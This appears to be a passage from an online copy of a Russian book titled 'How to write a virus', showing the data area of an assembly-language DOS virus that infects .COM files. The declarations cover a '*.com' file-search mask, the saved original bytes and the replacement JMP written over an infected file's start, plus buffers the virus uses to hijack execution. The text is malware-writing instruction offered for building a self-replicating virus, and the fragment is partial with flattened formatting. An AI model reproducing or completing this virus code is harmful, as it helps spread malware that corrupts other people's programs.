"Игорь Коваль. Как написать вирус" - читать интересную книгу автора Теперь мы можем привести все данные, с которыми
работает наш вирус : ;/***********************************************/ ;Data area old_bytes db 0e9h ;Исходные три dw vir_len + 0dh ;байта ... dta_save db 128 dup (0) ;Массив для DTA maska db '*.com',0 ;Маска для поис- ;ка ... fn db 12 dup (' '),0 ;Место для имени ;файла new_bytes db 0e9h ;Код команды ;" JMP ..." db 00h ;HIGH db 00h ;LOW ;Он записывается ;в файл вместо ;первых трех end_file db 0ebh ;Первые два бай- db push_len ;та вируса в ;файле (команда ;перехода на се- ;кцию инициали- ;зации ... ss_save dw 0 ;Буфера для SS sp_save dw 0 ;и SP ... help_word dw 0 ;Промежуточная ;ячейка . com_com db 'COMMAND' ;Имя командного ;процессора ... inside db 0 ;Ячейка - инди- ;катор ... last db 0 ;Последний байт to_newstack equ $ - vir ;Смещение к сте- ;ку ... |
|
|